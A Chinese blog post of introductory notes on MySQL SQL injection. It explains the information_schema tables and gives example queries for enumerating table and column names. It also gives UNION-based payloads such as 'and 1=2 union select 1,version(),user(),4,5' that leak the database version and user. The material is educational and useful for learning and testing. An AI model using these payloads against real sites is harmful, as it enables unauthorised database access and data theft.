MYSQL报错注入杂记

本文介绍了MySQL中的元数据库information_schema,以及在Web安全中针对此数据库进行SQL注入攻击的方法。通过查询tables、columns等表获取数据库和字段信息,并利用1=2的错误条件结合UNION SELECT展示数据。还提到了通过group_concat()和unhex(hex())函数处理编码问题,以及如何判断SQL语句的连接符。
摘要由CSDN通过智能技术生成

元数据库information_schema

在5.0以后版本的MYSQL中存在着一个元数据information_schema,其中存储着用户在MYSQL中创建的所有其他数据库的信息。

当对PHP+MYSQL类网站进行注入时,主要是针对information_schema数据库进行操作;

 

比较重要的数据表:

schema:用于存放所有数据库的名字;

tables:用于存放所有数据库中的数据表的名字;

columns:用于存放所有数据库的所有数据表中的所有字段的名字;

eg.

查看数据库cms0308数据库中包含了那些表:

select table_name from information_schema.tables where table_schema = "cms0308";

查看hack数据表中包含了哪些字段:

select column_name from information_schema.columns where table_name="hack";

 

 

通过加上1=2用于造成前面的语句错误,只显示后面select1,2的内容:

select * from hack where id=1 and 1=2 union select 1,2

若没有加上1=2,上述语句将只返回前面正确内容。

 

查看当前版本号,当前用户:

select * from hack where id=1 and 1=2 union select 1,version(),user(),4,5

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Atm0n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值